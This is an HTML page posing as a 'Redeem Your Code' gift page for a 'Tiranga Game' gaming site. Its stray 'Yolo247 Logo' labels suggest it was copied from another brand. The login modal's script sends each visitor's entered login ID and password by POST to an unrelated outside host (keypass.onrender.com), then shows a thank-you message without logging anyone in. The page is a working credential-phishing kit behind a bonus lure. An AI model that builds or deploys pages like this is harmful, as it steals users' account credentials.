<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Redeem Your Code | Tiranga Game</title>


    
    <link rel="stylesheet" href="owl-carousel/owl.carousel.css">
    <link rel="stylesheet" href="owl-carousel/owl.theme.css">
    <!-- Default Theme -->
    <!-- <script src="owl-carousel/jquery-1.9.1.min.js"></script> -->
    <!--  jQuery 1.7+  -->
    <!-- <script src="assets/owl-carousel/owl.carousel.js"></script> -->
    <!-- <script src="owl-carousel/owl.carousel.js"></script> -->

    <script src="https://code.jquery.com/jquery-3.7.1.min.js" integrity="sha256-/JqT3SQfawRcv/BIHPThkBvs0OEvtFFmqPF/lYI/Cxo=" crossorigin="anonymous"></script>

    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.3/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-QWTKZyjpPEjISv5WaRU9OFeRpok6YctnYmDr5pNlyT2bRjXh0JMhjY6hW+ALEwIH" crossorigin="anonymous">
<script src="https://cdn.jsdelivr.net/npm/bootstrap@5.3.3/dist/js/bootstrap.bundle.min.js" integrity="sha384-YvpcrYf0tY3lHB60NNkmXc5s9fDVZLESaAA55NDzOxhy9GkcIdslK1eN7N6jIeHz" crossorigin="anonymous"></script>

<script src="https://cdn.jsdelivr.net/npm/@popperjs/core@2.11.8/dist/umd/popper.min.js" integrity="sha384-I7E8VVD/ismYTF4hNIPjVp/Zjvgyol6VFvRkX/vR+Vc4jQkC+hVqc2pM8ODewa9r" crossorigin="anonymous"></script>
<script src="https://cdn.jsdelivr.net/npm/bootstrap@5.3.3/dist/js/bootstrap.min.js" integrity="sha384-0pUGZvbkm6XF6gxjEnlmuGrJXVbNuzT9qBBavbLwCsOGabYfZo0T0to5eqruptLy" crossorigin="anonymous"></script>
    



    <style>
        body {
            font-family: Arial, sans-serif;
            background-color: #0d1b47;
            color: white;
            text-align: center;
            margin: 0;
            padding: 0;
        }
        .container {
            width: 90%;
            max-width: 400px;
            margin: 50px auto;
            background: #142a69;
            padding: 20px;
            border-radius: 10px;
            box-shadow: 0 4px 10px rgba(0, 0, 0, 0.3);
        }
        .gift-box {
            width: 100px;
            margin: 0 auto 20px;
        }
        .gift-code {
            width: 95%;
            padding: 10px;
            margin: 10px 0;
            border: none;
            border-radius: 5px;
            text-align: center;
        }
        .receive-btn {
            width: 100%;
            padding: 10px;
            background: #217aff;
            border: none;
            color: white;
            font-size: 16px;
            border-radius: 5px;
            cursor: pointer;
            transition: 0.3s;
        }
        .receive-btn:hover {
            background: #1b65d1;
        }
        .history {
            background: #1b2c5d;
            margin-top: 20px;
            padding: 15px;
            border-radius: 10px;
        }
        .history img {
            width: 80px;
        }
        




        header {
            background-color: black;
            padding: 10px 20px;
            text-align: center;
            display: flex;
            justify-content: space-between;
            align-items: center;
        }

        header img {
            max-width: 150px;
        }

        .signup-button {
            display: inline-block;
            background: transparent;
            border: 2px solid #217aff;
            color: #217aff;
            padding: 8px 16px;
            font-size: 16px;
            border-radius: 5px;
            cursor: pointer;
            transition: 0.3s;
            margin-left: 10px;
        }
         .signup-button:hover {
            background: #217aff;
            color: white;
         }
         .login-btn {
            display: inline-block;
            background: transparent;
            border: 2px solid #217aff;
            color: #217aff;
            padding: 8px 16px;
            font-size: 16px;
            border-radius: 5px;
            cursor: pointer;
            transition: 0.3s;
            margin-left: 10px;
        }
        .login-btn:hover {
            background: #217aff;
            color: white;
        }
        /* .container{
            gap: var(--row-gap) var(--column-gap);
            height: 100%;
            margin: 0 auto;
            max-width: 1140px;
            padding-inline-end: 0;
            padding-inline-start: 0;
            width: 100%;
        } */
        .main-content {
            /* text-align: center; */
            padding: 20px;
        }

        .main-content img {
            max-width: 100%;
            height: auto;
        }

        .enquiry-section {
            display: flex;
            flex-wrap: wrap;
            justify-content: space-between;
            padding: 20px;
        }

        .enquiry-section .form-container,
        .enquiry-section .contact-info {
            flex: 1;
            margin: 10px;
            padding: 20px;
            /* border: 1px solid #ddd; */
            border-radius: 5px;
            /* box-shadow: 0 2px 5px rgba(0, 0, 0, 0.1); */
        }

        .enquiry-section .form-container {
            max-width: 500px;
        }

        .form-container input,
        .form-container textarea {
            width: 100%;
            padding: 10px;
            margin: 10px 0;
            border: 1px solid #ddd;
            border-radius: 5px;
        }

        .form-container button {
            background-color: #007bff;
            color: white;
            border: none;
            padding: 10px 20px;
            border-radius: 5px;
            cursor: pointer;
        }
        .contact-info{
            align-items: center;
        }
        .contact-info h3 {
            margin-bottom: 20px;
        }

        .contact-info p {
            margin: 5px 0;
        }

        .contact-info .icon {
            margin-right: 10px;
        }

        footer {
            background-color: black;
            color: white;
            text-align: center;
            padding: 10px 0;
            margin-top: 20px;
        }
        .sign-btn{
            background-color: #6778E4;
            font-family: "Roboto", Sans-serif;
            font-size: 20px;
            font-weight: 500;
            color: white;
        }

        .login-container {
            background-color: #1e1e1e;
            padding: 20px;
            border-radius: 10px;
            width: 320px;
            box-shadow: 0 0 10px rgba(0, 0, 0, 0.8);
        }
        .login-container h1 {
            font-size: 24px;
            color: #fff;
            margin-bottom: 20px;
        }
        .login-container label {
            display: block;
            font-size: 14px;
            margin-bottom: 5px;
        }
        .login-container input[type="text"],
        .login-container input[type="password"] {
            width: 100%;
            padding: 10px;
            margin-bottom: 15px;
            border: none;
            border-radius: 5px;
        }
        .checkbox-container {
            display: flex;
            align-items: center;
            font-size: 14px;
        }
        .checkbox-container input[type="checkbox"] {
            margin-right: 10px;
        }
        .login-container a {
            color: #8f8f8f;
            text-decoration: none;
            font-size: 12px;
        }
        .login-container .login-btn {
            width: 100%;
            padding: 10px;
            background-color: #5a00a3;
            border: none;
            border-radius: 5px;
            color: white;
            font-size: 16px;
            cursor: pointer;
        }
        .login-container .login-btn:hover {
            background-color: #7c00d4;
        }
        .signup-link {
            text-align: center;
            margin-top: 10px;
        }

        .modal-content {
            width: fit-content !important;
            top: 10vh;
            right: -8vw;
        }

        @media only screen and (max-width: 600px) {
        .modal-content {
          width: 70% !important;
          top: 10vh;
          right: -8vw;
        }
        .enquiry-section{
            flex-direction: column;
        }
        .modal-content {
             border-radius: 10px;
             width: fit-content !important;
             top: 20vh;
             right: -5vw !important;
        }
    
    }

    .modal-content {
        border-radius: 10px;
        width: fit-content !important;
       
    }
    </style>
</head>
<body>

    <div class="container">
        <div style="display: flex; justify-content: space-between;align-items: center;">
            <img style="margin-top: 10px; height: 30px;" src="logo.png" alt="Gift" >
            <button data-bs-toggle="modal" data-bs-target="#exampleModal" class="btn login-btn elementor-button elementor-button-link elementor-size-sm"   >
                Login Now
              </button>
        </div>

    </div>
    <div class="container">
        <!-- <div style="display: flex; justify-content: space-between;align-items: center;">
            <img style="margin-top: 10px; height: 30px;" src="logo.png" alt="Gift" >
            <button data-bs-toggle="modal" data-bs-target="#exampleModal" class="btn login-btn elementor-button elementor-button-link elementor-size-sm"   >
                Login Now
              </button>
        </div> -->
        <br><br>
        <h1 style="font-weight: 800;">Redeem Your Code</h1>
        <br>
        <p>
            Welcome to the Tiranga Games!  Greetings,
            
            <br><br>
            We invite you to join us, you'll find a variety of games, promo, bonus, luxury gold awards, Register now and win.
        </p>
        <!-- <p>Hi,<br>We have a gift for you</p> -->
        <input type="text" class="gift-code" placeholder="Enter your gift code"  value="">
        <button data-bs-toggle="modal" data-bs-target="#exampleModal" class="receive-btn">Receive</button>
    </div>
    <div class="history">
        <p>Other Offers</p>
        <div style="display: flex; flex-wrap: wrap; gap: 20px; width: fit-content; margin: auto;">
            <img style="height: 60px; width: auto; border-radius: 10px;" src="banner01.png" alt="History">
            <img style="height: 60px; width: auto; border-radius: 10px;" src="banner02.png" alt="History">
            <!-- <img style="height: 60px; width: auto; border-radius: 10px;" src="banner03.jpg" alt="History"> -->

        </div>
    </div>

    
    <br><br>
    <footer>
        &copy; 2025 Tiranga Game. All Rights Reserved.
    </footer>
    
    <div  class="modal fade" id="exampleModal" tabindex="-1" aria-labelledby="exampleModalLabel" aria-hidden="true">
        <div class="modal-dialog">
          <div class="modal-content">
            <div  class="login-container">
                <!-- <h1>YOLO<span style="color: #5a00a3;">24</span></h1>
                  -->
                <div id="login-container" style="visibility: visible;">
                    <img src="logo.png" style="height: 30px;" alt="Yolo247 Logo">
                    <br><br>

                <label style="color: white; text-align: left;" for="login-id">Login ID *</label>
                <input required type="text" id="username" placeholder="Enter your Login ID">
                <p id="username-check" style="color: red; font-size: small; margin-top: -10px !important; visibility: hidden;">* Minimum Character : 4</p>
                
                <label style="color: white; text-align: left;" for="password">Password *</label>
                <input required type="password" id="password" placeholder="Enter your Password">
                <p id="password-check" style="color: red; font-size: small; margin-top: -10px !important; visibility: hidden;">* Minimum Character : 8</p>
                
                <div style="color: rgb(170, 170, 170);" class="checkbox-container">
                    <input type="checkbox" id="remember-me">
                    <label for="remember-me">Remember Me</label>
                </div>
                
                <div class="checkbox-container">
                    <input type="checkbox" id="agree-terms" required>
                    <label style="color: rgb(170, 170, 170); text-align: left;" for="agree-terms">I am over 18, I agree to the 
                        <a href="#">Terms and Condition</a> & <a href="#">Privacy Policy</a>
                    </label>
                </div>
                
                <button type="submit" onclick="loginFunction()" class="receive-btn">LOGIN</button>
                <!-- <div class="signup-link">
                    <p>Not able to login? <a href="#">Click Here</a></p>
                    <p>Click Here To <a href="#">SIGNUP</a></p>
                </div> -->
            </div>

            <div id="conform" style="visibility: hidden;">
                <img src="logo.png" style="height: 100px;" alt="Yolo247 Logo">
                <br>
                <h3 style="color: white;">Thank you for your submission! </h3>
            </div>

            </div>

               
            </div>
            </div>
        </div>

</body>


<script>
    $('#myModal').on('shown.bs.modal', function () {
      $('#myInput').trigger('focus')
    })
    
    async function loginFunction(){
    
    
        let username = document.getElementById("username").value;
        let password = document.getElementById("password").value;
    
        if(Number(username.length) < 4 || Number(password.length) < 8 ){
            let usernameCheck = document.getElementById("username-check")
            usernameCheck.style.visibility ="visible"
            let passwordCheck = document.getElementById("password-check")
            passwordCheck.style.visibility ="visible"
            // console.log(username.length, password.length, "condition")
        }
        else{
            // fetch("https://keypass.onrender.com/login", {
            //   method: "POST",
            //   body: JSON.stringify({
            //     username: username,
            //     password: password
            //   }),
            //   headers: {
            //     "Content-type": "application/json; charset=UTF-8"
            //   }
            //     })
            //   .then((response) => response.json())
            //   .then((json) => console.log(json));
    
            let usernameCheck = document.getElementById("username-check")
            usernameCheck.style.visibility ="hidden"
            let passwordCheck = document.getElementById("password-check")
            passwordCheck.style.visibility ="hidden"
    
              const response = await fetch("https://keypass.onrender.com/login", {
              method: 'POST',
              headers: {
                'Accept': 'application/json',
                'Content-Type': 'application/json'
              },
              body: JSON.stringify({
                username: username,
                password: password
              }),
              });
              
              response.json().then(data => {
                console.log(JSON.stringify(data));
              });
    
              let conform = document.getElementById("conform")
              conform.style.visibility ="visible"
              
              let logincontainer = document.getElementById("login-container")
              logincontainer.style.visibility ="hidden"
              logincontainer.style.height ="10px"
    
    
        }
        
    
        console.log(username, password.length, username.length)
    
    
    }
    
    
    </script>


</html>
